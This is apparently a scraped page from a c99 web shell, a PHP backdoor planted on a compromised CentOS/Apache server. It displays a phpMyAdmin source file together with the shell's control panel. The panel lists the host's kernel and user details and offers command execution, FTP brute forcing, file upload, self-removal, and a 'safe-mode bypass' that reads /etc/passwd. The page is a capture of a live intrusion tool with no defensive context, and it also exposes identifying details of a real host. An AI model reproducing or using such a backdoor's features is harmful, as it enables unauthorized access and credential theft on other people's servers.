!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.6 GB of 127.8 GB (41.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     transformation_wrapper.php (3.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
 $option) {
        if (substr($option, 0, 10) == '; charset=') {
            $mime_options['charset'] = $option;
        }
    }
}

// garvin: For re-usability, moved http-headers and stylesheets
// to a seperate file. It can now be included by libraries/header.inc.php,
// querywindow.php.

require_once('./libraries/header_http.inc.php');
// [MIME]
if (isset($ct) && !empty($ct)) {
    $content_type = 'Content-Type: ' . urldecode($ct);
} else {
    $content_type = 'Content-Type: ' . (isset($mime_map[urldecode($transform_key)]['mimetype']) ? str_replace('_', '/', $mime_map[urldecode($transform_key)]['mimetype']) : $default_ct) . (isset($mime_options['charset']) ? $mime_options['charset'] : '');
}
header($content_type);

if (isset($cn) && !empty($cn)) {
    header('Content-Disposition: attachment; filename=' . urldecode($cn));
}

if (!isset($resize)) {
    echo $row[urldecode($transform_key)];
} else {
    // if image_*__inline.inc.php finds that we can resize,
    // it sets $resize to jpeg or png

    $srcImage = imagecreatefromstring($row[urldecode($transform_key)]);
    $srcWidth = ImageSX( $srcImage );
    $srcHeight = ImageSY( $srcImage );

    // Check to see if the width > height or if width < height
    // if so adjust accordingly to make sure the image
    // stays smaller then the $newWidth and $newHeight

    $ratioWidth = $srcWidth/$newWidth;
    $ratioHeight = $srcHeight/$newHeight;

    if ($ratioWidth < $ratioHeight){
        $destWidth = $srcWidth/$ratioHeight;
        $destHeight = $newHeight;
    } else {
        $destWidth = $newWidth;
        $destHeight = $srcHeight/$ratioWidth;
    }

    if ($resize) {
        $destImage = ImageCreateTrueColor( $destWidth, $destHeight);
    }

//    ImageCopyResized( $destImage, $srcImage, 0, 0, 0, 0, $destWidth, $destHeight, $srcWidth, $srcHeight );
// better quality but slower:
    ImageCopyResampled( $destImage, $srcImage, 0, 0, 0, 0, $destWidth, $destHeight, $srcWidth, $srcHeight );

    if ($resize == 'jpeg') {
        ImageJPEG( $destImage, '', 75 );
    }
    if ($resize == 'png') {
        ImagePNG( $destImage);
    }
    ImageDestroy( $srcImage );
    ImageDestroy( $destImage );
}

/**
 * Close MySql non-persistent connections
 */
if (isset($GLOBALS['controllink']) && $GLOBALS['controllink']) {
    @PMA_DBI_close($GLOBALS['controllink']);
}
if (isset($GLOBALS['userlink']) && $GLOBALS['userlink']) {
    @PMA_DBI_close($GLOBALS['userlink']);
}
?>

bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0046 ]--